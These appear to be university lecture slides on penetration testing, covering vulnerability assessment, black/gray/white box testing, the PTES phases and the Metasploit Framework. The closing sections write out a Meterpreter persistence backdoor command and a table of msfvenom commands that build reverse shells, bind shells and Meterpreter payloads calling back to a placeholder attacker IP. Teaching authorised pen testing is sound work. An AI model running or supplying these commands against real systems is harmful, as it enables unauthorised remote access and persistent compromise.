CCCU

Week 6: Cybersecurity Fundamentals

Credits: 20

Module Leader: Ali Jaddoa

Lecture Name: Penetration Test (Pen Test)
CSF-P19133l

Today

  1. Recap Vuln Assessment
  2. Pen Testing
  3. Metasploit

Recap: Vulnerabilities Assessment

Vulnerability Assessment is a systematic process used to identify, quantify, and prioritise the security vulnerabilities in an information system. It aims to detect weaknesses that could be exploited by attackers.

  1. Network-Based Assessments
  2. Host-Based Assessments
  3. Web-Based Assessments
  4. Database Assessments

Steps in Conducting a Vulnerability Assessment

  1. Define the Scope
  2. Identify Vulnerabilities
  3. Classify and Prioritise Vulnerabilities
  4. Report Findings
  5. Remediation and Mitigation
  6. Re-assessment:
    • Continuous Monitoring

Penetration Testing (Pentest)

  • Pentest involves simulating cyber attacks to exploit vulnerabilities and test the effectiveness of security controls.

  • An authorised attack to find vulnerabilities.

  • Why bother?

    • To discover security weaknesses that could be exploited by real attackers.
    • To provide actionable insights for improving security measures.
    • To comply with security standards and regulations that require regular testing.

How PenTest is different from VA

VA detects and reports vulnerabilities, while Pentest actively attempts to exploit them to understand their real-world impact and risk.

| Aspect | PenTest | VA |
|---|---|---|
| Objective | Exploits vulnerabilities. | Identifies vulnerabilities. |
| Approach | Active, real attacks. | Passive, detection only. |
| Risk | Higher, may disrupt systems. | Lower, no exploitation. |
| Outcome | Report on exploitability. | List of vulnerabilities. |

Pentest: Challenges/Issues

| Challenge in Pentesting | Example |
|---|---|
| Scope Creep | Expanding beyond the agreed testing areas. |
| Evasion Techniques | Attackers using obfuscation to hide malware. |
| Time and Resource Limitations | A short test duration misses deeper vulnerabilities. |
| False Positives/Negatives | Reporting a vulnerability that does not exist, or missing a real threat. |
| Legal and Ethical Concerns | Testing without explicit permission in certain environments. |
| Rapidly Evolving Threats | A new zero-day exploit emerging during a pentest. |

Time: Is there a good time to do so?

Conducting penetration tests is especially important if an organisation has recently:

  • Made significant upgrades or other changes to its IT infrastructure or applications;
  • Applied security patches; or
  • Modified end-user policies, etc.

Types of Penetration Testing

Each technique varies in the knowledge the tester has of the system.

  1. Black box – No prior knowledge of the system, e.g. an online banking website --> SQL-I, XSS
  2. White box – opposite of black box, the tester has in-depth knowledge: access to the source code, DB, etc. --> review them.
  3. Gray box – somewhere in between black and white, limited information known: a certain part.

| | Black Box | Gray Box | White Box |
|---|---|---|---|
| Goal | Mimic a true cyber attack | Assess an organisation's vulnerability to insider threats | Simulate an attack where an attacker gains access to a privileged account |
| Access Level | No access or internal information | Some internal access and internal information | Complete open access to applications and systems |
| Pros | Most realistic | More efficient than black box and saves time and money (less guesswork, more focus, balance) | More comprehensive, less likely to miss a vulnerability, and faster |
| Cons | Time consuming and more likely to miss vulnerabilities | - | More data (e.g., source code) has to be released to the tester, and more expensive |
| Scenario | Pen Test Type |
|---|---|
| Scenario 1: A financial institution wants to assess its online banking portal for external threats, but only provides the pen tester with a login page URL and no additional internal information. | |
| Scenario 2: A software development company seeks a thorough security review of a newly developed internal application, sharing full access to code, network architecture, and admin credentials. | |
| Scenario 3: A retail business is concerned about potential insider threats and wants to test vulnerabilities in both public and internal sections of its e-commerce site. They provide limited access details. | |
| Scenario 4: A tech startup wants to validate its network security resilience. They give the pen tester access to some but not all network documentation and system credentials. | |

Consider: level of access, goal and type of vulns.

| Scenario | Black, White, or Gray | Explanation |
|---|---|---|
| 1 | Black Box | Since the institution provides no internal details, a Black Box test simulates an external attacker's perspective, focusing on publicly accessible vulnerabilities. |
| 2 | White Box | Full internal access allows for a White Box test, ideal for an in-depth examination of code, configurations, and internal security measures. |
| 3 | Gray Box | Limited access aligns with a Gray Box approach, which combines partial knowledge of the system and simulates a semi-privileged insider threat. |
| 4 | Gray Box | Partial access to network details makes Gray Box testing suitable, allowing testers to simulate an attack with limited insider knowledge. |

Penetration Testing Execution Standard (PTES): 7 Phases

  1. Pre-engagement
  2. Intelligence gathering
  3. Threat modeling
  4. Vulnerability analysis
  5. Exploitation
  6. Post exploitation
  7. Reporting

PTES Phases: Cont'

1. Pre-engagement

  • Determine purpose / aims of the test
  • Set the scope of the task, eg:
    • What is to be included / excluded?
    • Vectors: Social Eng., physical, electronic?
    • Start and end dates
    • Third parties, eg: cloud providers, ISPs
    • Testing security and/or incident response?

2. Intelligence gathering

  • Levels: 1. Compliance focused, 2. Best-practice focused, 3. Deep-level analysis
  • Target selection
  • Open Source Intelligence OSINT
    • Passive --> Traffic never sent to target (3rd party data)
    • Semi-passive --> Normal traffic to target
    • Active --> Should be detected (port scanning, web testing)
  • Physical
  • Electronic
  • Individual

3. Threat modeling (Next week Lecture)

It provides clarity on the organisation's risk appetite and prioritisation.

  • Business assets
  • Business processes
  • Threat agents
  • Threat capabilities
  • Compare to existing published compromises.

4. Vulnerability analysis

Discovering flaws in systems and applications which can be leveraged by an attacker.

  • Active
    • Scanning: ports, services
    • Banner grabbing
  • Passive
    • Metadata analysis, eg: MS Office file data
    • Network sniffing, eg: Switch cache overflow
  • Validation – correlate from different tools
  • Research – check findings with
    • Vulnerability DB, eg: NVD, and CVE
    • Vendor advisories
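As an added example for the Validation and Research steps above (not code from the slides), this Python script correlates findings from two scanner outputs, flags the ones only one tool reported for manual validation, and ranks the rest by advisory severity. The scanner output format, the two scan results and the advisory lookup table are constructed here, and the CVE ids are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample scanner output (one finding per line: host:port service cve-id);
# the CVE numbers are placeholders, not real advisories.
SCANNER_A = """\
10.0.0.5:22 openssh CVE-0000-0001
10.0.0.5:80 apache CVE-0000-0002
10.0.0.7:443 nginx CVE-0000-0003
"""
SCANNER_B = """\
10.0.0.5:22 openssh CVE-0000-0001
10.0.0.7:443 nginx CVE-0000-0003
10.0.0.9:3306 mysql CVE-0000-0004
"""
# Constructed stand-in for a vulnerability-database lookup (CVE id -> CVSS base score).
ADVISORY_DB = {"CVE-0000-0001": 9.8, "CVE-0000-0002": 5.3, "CVE-0000-0003": 7.5}
LINE_RE = re.compile(r"^([\d.]+):(\d+)\s+(\S+)\s+(CVE-\d{4}-\d{4,})$")

def parse_findings(text, source):
    """Return {(host, port, cve): service}; reject malformed lines instead of guessing."""
    findings = {}
    for line in filter(None, map(str.strip, text.splitlines())):
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"{source}: unparseable finding {line!r}")
        host, port, service, cve = m.groups()
        findings[(host, int(port), cve)] = service
    return findings

def correlate(*sources):
    """Map each finding to the set of scanner names that reported it."""
    seen = defaultdict(set)
    for name, text in sources:
        for key in parse_findings(text, name):
            seen[key].add(name)
    return seen

def triage(seen, scanner_count):
    """Confirmed = every scanner agrees; single-source findings need manual validation
    (possible false positive from one tool, or a real finding another tool missed)."""
    confirmed = sorted(k for k, s in seen.items() if len(s) == scanner_count)
    to_validate = sorted(k for k, s in seen.items() if len(s) < scanner_count)
    return confirmed, to_validate

def prioritise(findings):
    """Rank by advisory severity; CVEs absent from the DB sort last and need research."""
    return sorted(findings, key=lambda k: -ADVISORY_DB.get(k[2], -1.0))
```

Calling `triage(correlate(("a", SCANNER_A), ("b", SCANNER_B)), 2)` on the sample data confirms the two findings both tools agree on and queues the apache and mysql findings for validation.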

5. Exploitation

Focuses solely on establishing access to a system or resource by bypassing security restrictions.

  • Establish access to system
  • Should be a planned and precise strike
  • Identify high-value target assets
  • Avoid detection - evasive techniques

6. Post exploitation

Determines the value of the compromised machine and maintains control of it for later use.

| Area | Description | Example |
|---|---|---|
| Machine Configuration | Network and connectivity settings | Network interfaces, routing, DNS, VPN |
| Pillage | Identification of valuable resources and information | Programs, services, network shares |
| Users | User-related data that could be exploited | Network history, IM client data, encryption keys |
| Exfiltration Routes | Possible paths for covertly extracting data from the system | Network interfaces, VPN, cloud storage |
| Persistence Measures | Techniques used to maintain access to a compromised system | Scheduled tasks, malicious services, registry modifications |

7. Reporting

  • Executive summary
    • Background (aims, existing risks identified)
    • Narrative on effectiveness of test
    • Risk/rank (think Traffic light colour coding)
    • Recommendations
  • Technical report
    • Details of the tests
    • Scope of the exercise
    • Report intelligence findings as:
      • Passive, Corporate, Personnel, and Vulnerability

Metasploit Framework (MSF)

  • A penetration testing framework used for discovering, exploiting, and validating vulnerabilities.

  • Widely used in both offensive and defensive security contexts.


MSF-Architecture

Operates as a modular framework, allowing users to extend and customise its functionality.

  • Modules, Libraries, and Interfaces
  • Find Vulnerabilities and deploy Payloads

MSF: Interfaces

  1. msfconsole - an interactive command-line interface
  2. msfcli - a literal Linux command line interface
  3. msfweb - browser based interface
  4. Armitage - a GUI-based third party application

MSF: Libraries

  • Rex (Ruby Extension Library):
    • Provides sockets, protocols, text transformations
  • Core (Core library / msfcore):
    • Enables exploits, sessions, and plugins to interact with the different interfaces.
  • Base (Base library / msfbase):
    • Provides wrapper routines and utility classes that you can use to work easily with the Core library.

MSF: Modules

Each one performs a specific action, e.g. exploitation, scanning.

  • Exploits: take advantage of system weaknesses (vulnerabilities) to deliver a payload.
  • Payloads: malicious code; these are pieces of code executed after a successful exploit.
  • Auxiliary: supplementary tools and commands that do not easily fit into the other categories (not exploitation), e.g. scanners, fuzzers, DoS, etc.

MSF: Modules

  • Evasion/Encoder: re-encode payloads and exploits so that they avoid bad characters (e.g. null bytes) and can get past security defence systems such as AVs and IDSs.

  • NOP (No Operation): adds a sequence of NOP instructions with no side-effects:

    • improves exploit stability by creating a "landing area" for the payload in memory, increasing the chances of successful code execution.

MSF: Database

Uses a database (usually PostgreSQL) to store information about the exploits, payloads, sessions, and targets. This allows for efficient tracking and management of testing results.

  • DB stores information:
    • Host data (eg: IP addresses, port status)
    • Evidence
    • Exploit results

Payloads

| Type | Description | Example |
|---|---|---|
| Single Payloads | Simple, standalone payloads that execute immediately. | `cmd/windows/adduser` - adds a new user account |
| Staged Payloads | Two-part payload; first connects, then downloads the full payload. | `linux/x86/meterpreter/reverse_tcp` - connects back and loads Meterpreter |
| Inline Payloads | Combines all stages in a single payload; self-contained. | `windows/x64/exec` - executes a custom command on the target |
| Shell Payloads | Opens a basic command shell on the target system. | `cmd/windows/reverse_powershell` - reverse PowerShell shell |

MSF: Common post-exploitation activities

| Activity | Command Example | Purpose |
|---|---|---|
| Maintaining Access | `run persistence -X -i 5 -p 4444 -r <attacker_ip>` | Sets a persistent backdoor that reconnects every 5 seconds. |
| Privilege Escalation | `getsystem` | Attempts to elevate privileges to SYSTEM on Windows. |
| Information Gathering | `sysinfo` | Shows system details like OS version and architecture. |


Lab:

  • Pen Testing using Metasploit, see here.


  • Others – Post: these are used after an exploit is successful to gather further information from the compromised system or maintain access.

| Example of Payload | Purpose |
|---|---|
| `msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o reverse_shell.exe` | Windows reverse shell that connects back to the attacker. |
| `msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o reverse_shell.elf` | Linux x86 reverse shell that connects back to the attacker. |
| `msfvenom -p windows/shell_bind_tcp LPORT=<target_port> -f exe -o bind_shell.exe` | Windows bind shell that listens on a port on the target. |
| `msfvenom -p linux/x86/shell_bind_tcp LPORT=<target_port> -f elf -o bind_shell.elf` | Linux x86 bind shell that listens on a port on the target. |
| `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o meterpreter_reverse_shell.exe` | Windows Meterpreter payload that connects back to the attacker. |
| `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o meterpreter_reverse_shell.elf` | Linux x86 Meterpreter payload that connects back to the attacker. |
| `msfvenom -p windows/meterpreter/bind_tcp LPORT=<target_port> -f exe -o meterpreter_bind_shell.exe` | Windows Meterpreter payload that listens on a port on the target. |
| `msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=<target_port> -f elf -o meterpreter_bind_shell.elf` | Linux x86 Meterpreter payload that listens on a port on the target. |
| `msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.php` | PHP Meterpreter payload that connects back to the attacker. |
| `msfvenom -p javascript/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f js -o payload.js` | JavaScript Meterpreter payload that connects back to the attacker. |
| `msfvenom -p windows/exec CMD=<command> -f exe -o exec_command.exe` | Executes a command on the target Windows system. |
| `msfvenom -p linux/x86/exec CMD=<command> -f elf -o exec_command.elf` | Executes a command on the target Linux system. |
